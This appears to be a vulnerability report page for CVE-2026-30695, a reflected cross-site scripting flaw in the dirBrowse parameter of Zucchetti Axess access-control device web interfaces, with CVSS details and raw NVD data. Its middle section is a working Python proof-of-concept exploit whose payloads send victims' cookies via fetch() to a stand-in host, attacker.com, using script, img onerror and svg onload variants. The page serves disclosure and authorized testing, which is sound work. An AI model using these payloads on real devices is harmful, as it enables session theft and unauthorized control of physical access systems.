Security Vulnerability Report
CVE-2026-30695 CVSS 6.1 MEDIUM

CVE-2026-30695

Published: 2026-03-18 17:16:07
Last Modified: 2026-04-27 19:18:47

Description

A Cross-Site Scripting (XSS) vulnerability exists in the web-based configuration interface of Zucchetti Axess access control devices, including XA4, X3/X3BIO, X4, X7, and XIO / i-door / i-door+. The vulnerability is caused by improper sanitization of user-supplied input in the dirBrowse parameter of the /file_manager.cgi endpoint.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zucchetti Axess XA4 (all versions)
Zucchetti Axess X3/X3BIO (all versions)
Zucchetti Axess X4 (all versions)
Zucchetti Axess X7 (all versions)
Zucchetti Axess XIO (all versions)
Zucchetti Axess i-door (all versions)
Zucchetti Axess i-door+ (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib.parse

# CVE-2026-30695 PoC - Zucchetti Axess XSS in /file_manager.cgi
# Target: Zucchetti Axess access control devices (XA4, X3/X3BIO, X4, X7, XIO/i-door/i-door+)

TARGET_URL = "http://target-device-ip/file_manager.cgi"

# XSS payload to steal cookies
xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'

# Alternative XSS payloads
xss_payloads = [
    '<script>alert(document.cookie)</script>',
    '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">',
    '<svg onload="fetch(\'https://attacker.com/log?c=\'+document.cookie)">'
]


def exploit(target_url, payload):
    """Send XSS payload via dirBrowse parameter"""
    params = {
        'dirBrowse': payload,
        'action': 'browse'  # Typical file manager action
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Payload: {urllib.parse.unquote(payload)}")
        print(f"[*] Status: {response.status_code}")
        # Unescaped reflection of the parameter value indicates the CWE-79 issue
        if payload in response.text:
            print("[+] XSS payload reflected in response - vulnerability confirmed!")
        else:
            print("[-] Payload not found in response")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


def main():
    print("=" * 60)
    print("CVE-2026-30695 PoC - Zucchetti Axess XSS")
    print("=" * 60)

    # Test basic XSS
    print("\n[*] Testing basic XSS payload...")
    exploit(TARGET_URL, xss_payloads[0])

    # Test alternative payload
    print("\n[*] Testing img tag XSS payload...")
    exploit(TARGET_URL, xss_payloads[1])

    print("\n[!] Note: This PoC is for authorized security testing only.")
    print("[!] Ensure you have permission before testing any system.")


if __name__ == "__main__":
    main()
```

References

http://firmware.com
http://zucchetti.com
https://github.com/iremnurylmz/CVE-2026-30695

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30695", "sourceIdentifier": "[email protected]", "published": "2026-03-18T17:16:06.817", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in the web-based configuration interface of Zucchetti Axess access control devices, including XA4, X3/X3BIO, X4, X7, and XIO / i-door / i-door+. The vulnerability is caused by improper sanitization of user-supplied input in the dirBrowse parameter of the /file_manager.cgi endpoint."}, {"lang": "es", "value": "Existe una vulnerabilidad de Cross-Site Scripting (XSS) en la interfaz de configuración basada en web de los dispositivos de control de acceso Zucchetti Axess, incluyendo XA4, X3/X3BIO, X4, X7, y XIO / i-door / i-door+. La vulnerabilidad es causada por la sanitización inadecuada de la entrada proporcionada por el usuario en el parámetro dirBrowse del endpoint /file_manager.cgi."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://firmware.com", "source": "[email protected]"}, {"url": "http://zucchetti.com", "source": "[email protected]"}, {"url": "https://github.com/iremnurylmz/CVE-2026-30695", "source": "[email protected]"}]}}